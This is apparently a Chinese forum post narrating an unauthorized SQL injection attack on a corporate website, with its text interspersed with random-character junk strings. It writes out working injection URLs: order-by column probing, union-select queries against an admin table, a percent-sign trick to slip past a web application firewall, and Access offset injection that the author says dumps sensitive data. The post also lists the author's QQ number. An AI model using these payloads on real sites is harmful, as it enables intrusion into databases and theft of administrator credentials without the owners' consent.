打开网站,一个企业站。2 J( m2 o3 u& D4 K- t
8 J% \% j8 K$ ~
- c8 Y4 C! F0 t! m) q! f; K
顺手加个admin, y: E. J* Y6 `$ C3 e
( i# F, b( d# L: p9 \
0 X0 Z( F$ g4 }默认后台。5 t* I$ T( q; e( R6 i! G
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。9 z& c8 ^. {+ r. P7 A6 \$ u$ x0 N; D( x
- w5 o. v8 F- Z7 a( w3 _* P% A
+ @, q7 Y2 z4 L8 [- g8 D# H1 w
所以就不用御剑扫了,待会直接封IP。' o! d1 y9 H3 D# u
( \( y" ~7 Z5 t% Y; r4 F
用order by语句判断是否存在注入。
0 o( k. s) |& u7 e' b* Fhttp://www.xxx.com /product_show.asp?id=997 order by 1+ L$ d4 p& L' w9 D
http://www.xxx.com /product_show.asp?id=997 order by 100: \) Q Q8 K6 T5 f
现在存在注入,经测试后发现是9个字段。
- [6 h+ ~ ^8 F5 L& {) u8 s ' _* k5 \, g7 T F5 h- w! U
接下来进行联合查询,猜是否存在admin表。9 D. c, D- ~ ]/ j* g- T. f+ V4 h
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。9 f( m) i* Y' R
* G- A$ I4 Y/ t
( ]' U' ~; s, t# ^
8 U7 E' K g: _- `# l在select中间加个%,se%lect绕过安全狗。) i7 R" n' [$ W( S- K) f: Q! Y
8 T2 n8 ?- |, M( A. l$ b& E$ D
* Q7 \# g8 W1 i# d) \8 u发现存在admin表,然后开始手工猜常用的字段。
0 u9 J0 K8 b+ C% X0 L9 H5 |纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。, j( z# O$ F) O E) b5 x# X4 e
8 }' Y2 S" A) |+ e
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
4 {6 }* N7 c2 X) s. z1 H
) s8 l, y( f9 J+ t8 C2 J5 r科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
+ s% Z4 Z/ i6 z+ W- rhttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
3 v0 |9 C1 p# h0 F: L好了,敏感内容出显了。! W& n( L2 g5 W I: q* W% p
/ q6 r# c6 j* ^8 |8 p4 P
/ M! A' a k. K$ L H) S- k, M. l* o" k* Y9 c
|